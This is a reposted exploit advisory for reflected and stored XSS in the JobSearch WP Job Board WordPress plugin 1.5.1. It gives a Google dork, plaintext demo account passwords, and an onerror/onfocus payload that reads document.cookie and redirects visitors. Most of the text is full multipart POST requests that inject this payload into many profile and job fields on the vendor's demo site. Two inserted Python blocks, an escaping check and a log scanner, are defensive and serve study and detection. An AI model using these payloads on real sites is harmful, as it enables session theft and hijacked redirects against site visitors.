JobSearch WP Job Board WordPress Plugin v1.5.1 - Multiple Vulnerabilities

CVE: CVE-2020-35648
Category: CWE-79
Price: $1500
Severity: Critical
Author: Exploit Alert Team
Risk: High
Exploitation Type: Remote
Date: 2020-07-18
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070097

Below is a copy:

JobSearch WP Job Board WordPress Plugin v1.5.1 - Multiple Vulnerabilities
[+] Exploit Title: JobSearch WP Job Board WordPress Plugin v1.5.1 - Multiple Vulnerabilities
[+] Google Dork: inurl:/wp-content/plugins/wp-jobsearch/
[+] Date: 2020-07-03
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Eyecix [ http://eyecix.com ]
[+] Software Version: 1.5.1
[+] Software Link: https://codecanyon.net/item/jobsearch-wp-job-board-wordpress-plugin/21066856
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] One unauthenticated reflected XSS and multiple authenticated persistent XSS vulnerabilities were discovered in the JobSearch plugin through version 1.5.1 for WordPress.

[i] The authenticated persistent XSS on the Job Page triggers both in the dashboard area /user-dashboard/?tab=manage-jobs and on the job page itself.

[i] Demo account #1 (Candidate): vladvector / DJKNFU#$&H#IUFD (login / password)

[i] Demo account #2 (Employer): vladvector2 / DJKNFU#$&H#IUFD (login / password)

[i] Candidate Profile URL: https://eyecix.com/plugins/jobsearch/candidate/vladvector/

[i] Employer Profile URL: https://eyecix.com/plugins/jobsearch/employer/vladvector/

[i] Employer Job URL: https://eyecix.com/plugins/jobsearch/job/poc/



### [ Vulnerabilities: ]

[x] Unauthenticated Reflected XSS -> /?location=[payload]

[x] Authenticated Persistent XSS -> Candidate Profile (vulnerable fields: Phone, Dial Code, Job Title, Academic Level, Age, Salary, Gender, Industry, Full Address)

[x] Authenticated Persistent XSS -> Employer Profile (vulnerable fields: Phone, Dial Code, Founded Since, Member Title, Designation, Experience, Facebook URL, Google+ URL, Twitter URL, LinkedIn URL, Description, Full Address)

[x] Authenticated Persistent XSS -> Job Page (vulnerable fields: Offered Salary, Career Level, Experience, Gender, Industry, Qualifications, Job Description, Full Address)



### [ Payload: ]

[$] "--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
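Added example, not code from the advisory or the plugin: the payload above is dropped into a quoted input attribute with and without attribute-context escaping, and Python's stdlib HTML parser reports which elements and on* handlers result. The templates are hypothetical stand-ins for the plugin's markup (which the advisory does not show), and `html.escape` plays the role of WordPress `esc_attr()`.

```python
import html
from html.parser import HTMLParser

# Payload exactly as listed under "[ Payload: ]" in the advisory.
STORED_PAYLOAD = (
    '"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);'
    '(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->'
)
# Shortened form of what the reflected ?location= PoC percent-decodes to.
REFLECTED_PAYLOAD = '" autofocus onfocus=alert(document.domain); ">'


def render_unescaped(value: str) -> str:
    """Hypothetical vulnerable template: user input is written straight into a
    quoted attribute (stand-in for the plugin's markup, not its real code)."""
    return f'<input type="text" name="location" value="{value}">'


def render_escaped(value: str) -> str:
    """Same template with attribute-context escaping (esc_attr() equivalent):
    quotes, angle brackets and ampersands become entities."""
    return f'<input type="text" name="location" value="{html.escape(value, quote=True)}">'


class HandlerAudit(HTMLParser):
    """Records every element and every on* event-handler attribute that a
    tolerant HTML parser sees in the rendered markup."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.handlers: list[tuple[str, str]] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for name, _ in attrs:
            if name.lower().startswith("on"):
                self.handlers.append((tag, name.lower()))


def audit(markup: str) -> tuple[list[str], list[tuple[str, str]]]:
    """Parse the markup and return (element names, (element, handler) pairs)."""
    parser = HandlerAudit()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.handlers


if __name__ == "__main__":
    # Unescaped: the stored payload closes the attribute and injects an <img onerror>;
    # the reflected one adds onfocus to the input itself. Escaped: one harmless <input>.
    for label, payload in (("stored", STORED_PAYLOAD), ("reflected", REFLECTED_PAYLOAD)):
        for mode, render in (("unescaped", render_unescaped), ("escaped", render_escaped)):
            tags, handlers = audit(render(payload))
            print(f"{label:9s} {mode:9s} tags={tags} handlers={handlers}")
```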



### [ PoC Unauthenticated Reflected XSS: ]

[!] https://eyecix.com/plugins/jobsearch/?location=%22%20autofocus%20onfocus%3Dalert%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3Balert%28document.domain%29%3Bwindow.location%3D%60https%3A%2F%2Ftwitter.com%2Fvlad_vector%60%3B%20%22%3E

[!] GET /plugins/jobsearch/?location=%22%20autofocus%20onfocus%3Dalert%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3Balert%28document.domain%29%3Bwindow.location%3D%60https%3A%2F%2Ftwitter.com%2Fvlad_vector%60%3B%20%22%3E HTTP/1.1
Host: eyecix.com
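Added detection example, not part of the advisory: a scanner that parses constructed access-log lines and flags requests whose percent-decoded query values contain markup or event-handler syntax. It generalises from the `location` parameter in the PoC above to every query parameter; the log format, timestamps and IP addresses are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Markup or script-bearing syntax that has no business in a search-location string.
SUSPICIOUS = re.compile(r'[<>"\']|\bon[a-z]+\s*=|javascript:|`', re.IGNORECASE)

# Common/combined log format; only the fields needed here are named.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)


def suspicious_params(path: str) -> list[tuple[str, str]]:
    """Return (parameter, decoded value) pairs whose value looks like markup.
    parse_qs decodes once; unquote decodes a second time to catch
    double percent-encoding."""
    hits = []
    for name, values in parse_qs(urlsplit(path).query, keep_blank_values=True).items():
        for value in values:
            decoded = unquote(value)
            if SUSPICIOUS.search(decoded):
                hits.append((name, decoded))
    return hits


def scan_log(lines) -> list[tuple[str, str, str]]:
    """Return (client ip, parameter, decoded value) for every flagged request."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a parseable request line
        for name, decoded in suspicious_params(m["path"]):
            findings.append((m["ip"], name, decoded))
    return findings


# Constructed access-log lines; the second reuses the shape of the advisory's PoC URL.
SAMPLE_LOG = [
    '203.0.113.10 - - [03/Jul/2020:12:00:01 +0000] "GET /plugins/jobsearch/?location=New%20York HTTP/1.1" 200 5120',
    '203.0.113.77 - - [03/Jul/2020:12:00:09 +0000] "GET /plugins/jobsearch/?location=%22%20autofocus%20onfocus%3Dalert%28document.domain%29%3B%20%22%3E HTTP/1.1" 200 5377',
    '203.0.113.10 - - [03/Jul/2020:12:01:30 +0000] "POST /plugins/jobsearch/user-dashboard/?tab=dashboard-settings HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for ip, name, decoded in scan_log(SAMPLE_LOG):
        print(f"{ip} param={name!r} value={decoded!r}")
```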



### [ PoC Authenticated Persistent XSS -> Candidate User Profile: ]

[!] POST /plugins/jobsearch/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------27142012921130118151484572765
Content-Length: 6644
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_cvr_photo_cand"; filename=""
Content-Type: application/octet-stream


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_user_dob_whole"



-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_phone"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="dial_code"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="contry_iso_code"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_sector"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_candidate_jobtitle"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_type"

type_1
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_currency"

default
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_pos"

left
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_sep"

,
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_deci"

2
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_bio"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="academic-level"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="Age"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="salary"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="gender"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="industry"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_facebook_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_twitter_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_linkedin_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_dribbble_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_address"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_lat"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_lng"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_zoom"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------27142012921130118151484572765--



### [ PoC Authenticated Persistent XSS -> Employer User Profile: ]

[!] POST /plugins/jobsearch/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------321608141216835281602774802175
Content-Length: 6868
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_cvr_photo"; filename=""
Content-Type: application/octet-stream


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="display_name"

PoC
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_phone"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="dial_code"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="contry_iso_code"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_website"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_sector"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_dob_mm"

1
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_dob_dd"

1
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_dob_yy"

1900
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_bio"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="founded-since"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_facebook_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_twitter_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_linkedin_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_dribbble_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_address"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_lat"

37.090240
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_lng"

-95.712891
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

12
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_title[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_designation[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_experience[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_image[]"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_facebook[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_google[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_twitter[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_linkedin[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_description[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------321608141216835281602774802175--



### [ PoC Authenticated Persistent XSS -> Job Page: ]

[!] POST /plugins/jobsearch/post-new-jobs/ HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------35378657672420857749655614298
Content-Length: 5216
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/post-new-jobs/
Cookie: [cookies_here]

-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_title"

PoC
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_detail"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="application_deadline"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_sector"

12
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_type"

4
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="get_job_skills[]"

poc
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_apply_type"

internal
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_apply_url"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_apply_email"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_type"

type_1
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_max_salary"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_currency"

default
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_pos"

left
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_sep"

,
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_deci"

2
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="offered-salary"

31337"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="career-level"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="experience"

4-years"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="gender"

male"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="Industry"

graphics-designing"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="qualifications"

masters-degree"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_attach_files[]"; filename=""
Content-Type: application/octet-stream


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_address"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_lat"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_lng"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_zoom"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="user_job_posting"

1
-----------------------------35378657672420857749655614298--



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector
